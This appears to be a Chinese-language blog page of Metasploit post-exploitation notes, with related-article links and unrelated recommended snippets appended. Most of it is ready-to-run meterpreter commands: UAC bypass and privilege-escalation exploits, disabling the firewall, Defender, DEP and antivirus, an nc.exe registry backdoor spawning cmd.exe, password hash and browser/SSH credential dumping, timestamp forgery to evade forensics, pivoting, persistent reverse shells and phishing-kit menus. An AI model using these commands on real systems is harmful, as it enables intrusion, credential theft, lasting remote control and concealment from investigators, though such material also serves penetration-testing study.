已经获得目标操作系统控制权后扩大战果
提权
信息收集
渗透内网
永久后门
基于已有session扩大战果
绕过UAC限制
use exploit/windows/local/ask
set session -id
set filename
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
set session -id
set payload
利用漏洞直接提权为systen
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec
关闭windows防火墙--(需要管理员或system权限)
netsh advfirewall set allprofiles state on
关闭windefend
net stop windefend
Bitlocker磁盘加密
manage-bde -off C:
manage-bde -status C:
关闭DEP
bcdedit.exe /set {current} nx AlwaysOff
杀死防病毒软件
run killav
run post/windows/manage/killav
开启远程桌面服务
run post/windows/manage/enable_rdp
run getuid -e(截屏)
查看远程桌面
screenshot
use espia
screengrab
注册表保存着windows几乎全部配置参数
如果修改不当,可直接造成系统崩溃
修改前完整备份注册表
某些注册表的修改是不可逆的
常见用途
修改,增加启动项
窃取存储于注册表中的机密信息
绕过文件型病毒查杀
用注册表添加NC后门服务(meterpreter)
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -vnc
打开防火墙端口(meterpreter)
execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 "test" ENABLE ALL
shutdown -r -t 0
nc 192.168.1.12 4444
其他注册表项
https://support.accessdata.com/hc/en-us/articles/204448155-Registry-
Quick-Find-Chart
抓包
load sniffer(加载sniffer)
sniffer_interfaces(查看有几个网卡)
sniffer_start 2(使用第二个网卡)
sniffer_dump 2 1.cap /下载第二个网卡的数据包,命名为1.cao
在内存缓存区块存储抓包(50000包),不写硬盘,智能过滤meterpreter流量。传输全程使用SSL/TLS加密
解码
use auxiliary/sniffer/psnuffle
set PCAPFILE /root/1.cap
搜索文件
search -f *.ini
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.docx
John the Ripper 破解弱口令
use post/windows/gather/hashdump (dump hash system权限的meterpreter)
set session id
run 结果保存在/tmp目录下
use auxiliary/analyze/jtr_crack_fast(破解hash)
run
文件系统访问会留下痕迹,电子取证重点关注,渗透测试和攻击者往往希望销毁文件系统访问痕迹
最好的避免被电子取证发现的方法:不要碰文件系统---meterpreter的先天优势所在(完全基于内存)
MAC时间
ls -l --time=atime/mtime/ctime 1.txt
start 1.txt
touch -d "2 days ago" 1.txt
touch -t 1501010101 1.txt
MACE:MFT entry
MFTA:ntfs文件系统的主分区分配表master file table
通常1024字节或2个硬盘扇区,其中存放多项entry信息
包含文件大量信息(大小,名称,目录位置,磁盘位置,创建日期)
更多信息可研究 文件系统取证分析技术
Timestomp (meterpreter)
timestomp -v 1.txt(查看详细时间)
timestomp -f c:\\autoexec.bat 1.txt(使用模板生成)
-m / -a / -c / -e / -z
timestomp -z "1/29/1949 21:11:56" 2.txt
pivoting 跳板 / 枢纽 / 支点
利用已经控制的一台计算机作为入侵内网的跳板
在其他内网计算机看来访问全部来自于跳板机
run autoroute -s 192.168.2.0/24 (添加路由,访问外网的目标内网网段)
auxiliary/scanner/portscan/tcp(添加路由后,扫描内网)
pivoting端口转发portfwd
利用已经被控制计算机,在kali与目标之间实现端口转发
portfwd add -L LIP -l LPORT -r RIP -p RPORT
portfwd add -L 192.168.1.10 -l 445 -r 2.1.1.11 -p 3389
portfwd list / delete / flush
use exploit/windows/smb/ms08_067_netapi
set RHOST 127.0.0.1
set LHOST 2.1.1.10
use exploit/multi/handler
set exitonsession false
POST模块
run post/windows/gather/arp_scanner RHOSTS=2.1.1.0/24
run post/windows/gather/checkvm
run post/windows/gather/credentials/credential_collector
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_snmp
run post/multi/recon/local_exploit_suggester
run post/windows/manage/delete_user USERNAME=yuanfh
run post/multi/gather/env
run post/multi/gather/firefox_creds
run post/multi/gather/ssh_creds
run post/multi/gather/check_malware REMOTEFILE=c:\\a.exe
自动执行meterpreter脚本
set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
set InitialAutoRunScript checkvm
自动执行post模块
set InitialAutoRunScript migrate -n explorer.exe
set AutoRunScript post/windows/gather/dumplinks
持久后门
利用漏洞取得的meterpreter shell 运行于内存中,重启失效
重复exploit漏洞可能造成服务崩溃,持久后门保证漏洞修复后仍可远程控制
meterpreter后门
meterpreter>run metsvc -A (自动运行匹配shell)
use exploit/multi/handler(然后去链接目标)
set payload windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.1.12
持久后门
meterpreter>run persistence -h
meterpreter>run persistence -X -i 10 -p 4444 -r 192.168.1.10(反弹shell监听本机)
meterpreter>run persistence -U -i 20 -p 4444 -r 192.168.1.10(反弹shell监听本机)
meterpreter>run persistence -S -i 20 -p 4444 -r 192.168.1.10(反弹shell监听本机)
社会工程学
metasploit可以很好的配合到社会工程学攻击的各个阶段
setooklkit工具包大量依赖metasploit
基于浏览器等客户端软件漏洞实现对客户端计算机的攻击
社会:人是社会化的动物(人与人之间的关系,群体利益决定结构架构)
工程:依据标准的步骤完成任务达成目标的一套方法
通过人的交流,使用欺骗伪装等手段绕过安全机制实现入侵的非技术手段
社会工程学攻击的四个阶段
研究:信息收集(web,媒体,垃圾桶,物理),确定并研究目标
钩子:与目标建立第一次交谈(hook,下套)
下手:与目标建立信任并获取信息
退场:不引起目标怀疑的离开现场
类型:
基于人的社工:
搭载
伪造身份
偷听/窃肩
反社工
垃圾桶工程
基于计算机的社工:
弹出窗口
内部网络攻击
钓鱼邮件
短信诈骗
Social-Engineering Tookit(SET)
站点克隆:1 2 3 2
发送钓鱼邮件:1 1 2
web站点攻击向量:1 2 1 2
中间文件全部存在~/.set目录中
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn
kali linux之msf后渗透阶段的更多相关文章
-
kali linux之msf客户端渗透
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行p ...
-
Metasploit简单使用——后渗透阶段
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...
-
渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
-
Web渗透测试使用Kali Linux(一)渗透测试概要及环境部署
渗透测试是利用已经发现的漏洞,采用恶意黑客的惯用手段来尝试对漏洞进行攻击. Kali Linux是BackTrack的进化版,是Linux的衍生版本,专门开发用作渗透测试,其中提供了很多的渗透测试工具 ...
-
msf后渗透
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.e ...
-
kali linux 2.0 web 渗透测试 电子书
原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书 ...
-
后渗透阶段之基于MSF的路由转发
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网” ...
-
后渗透阶段之基于MSF的内网主机探测
当我们通过代理可以进入某内网,需要对内网主机的服务进行探测.我们就可以使用MSF里面的内网主机探测模块了. 在这之前,先修改 /etc/proxychains.conf ,加入我们的代理. 然后 pr ...
-
kali linux之Msf
目前最流行,最强大,最具扩展性的渗透测试平台软件 基于metasploit进行渗透测试和漏洞分析的流程和方法 框架集成了渗透测试标准(PETS)思想 一定程度上统一了渗透测试和漏洞研究的工作环境 新的 ...
随机推荐
-
为自己的git添加alias,命令缩写
在多人协作开发时,一般用git来进行代码管理.git有一些命令如:git pull . git push等等,这些命令可以设置alias,也就是缩写.如:git pull 是 git pl, git ...
-
linux 学习笔记3
①find -name *.txt //查看当前目录所有文件 .txt 结尾文件 ②whereis *.txt //查看.txt结尾文件 但不显示 .txt 打包:tar -cf a.tar ...
-
PHP 简易读取文件目录下的文件,生成css spirte图片
因为个人不是对PS熟悉,不清楚如何在PS中生成一张横向有序的spirte图片,使用了"css sprite V4.3"版本,生成的图片会出现压缩图片大小的情况,本想修改原作者开发的 ...
-
[bzoj4872]分手是祝愿
Description Zeit und Raum trennen dich und mich. 时空将你我分开.B 君在玩一个游戏,这个游戏由 n 个灯和 n 个开关组成,给定这 n 个灯的初始状态 ...
-
css居中,margin_and_position
首先父元素肯定是要相对定位的,其次我们上下左右居中的元素的css如下: width: 50px; height: 50px; margin: auto; position: absolute; lef ...
-
Python内置函数(40)——map
英文文档: map(function, iterable, ...) Return an iterator that applies function to every item of iterabl ...
-
Django 组件之 ----- content-type
Django 组件之 content-type的使用 一个表和多个表进行关联,但具体随着业务的加深,表不断的增加,关联的数量不断的增加,怎么通过一开始通过表的设计后,不在后期在修改表,彻底的解决这个问 ...
-
AD域与外部网站域名相同处理办法
环境 域控:Windows Server 2008 r2 AD域:example.cn 问题:DNS可以正常解析外部域名(如www.baidu.com),但是无法解析mail.example.cn 原 ...
-
TZOJ 3315 买火车票(线段树区间最小值)
描述 Byteotian州铁道部决定赶上时代,为此他们引进了城市联网.假设城市联网顺次连接着n 个市从1 到n 编号(起始城市编号为1,终止城市编号为n).每辆火车有m个座位且在任何两个运送更多的乘客 ...
-
反向传播算法 Backpropagation Algorithm
假设我们有一个固定样本集,它包含 个样例.我们可以用批量梯度下降法来求解神经网络.具体来讲,对于单个样例(x,y),其代价函数为:这是一个(二分之一的)方差代价函数.给定一个包含 个样例的数据集,我们 ...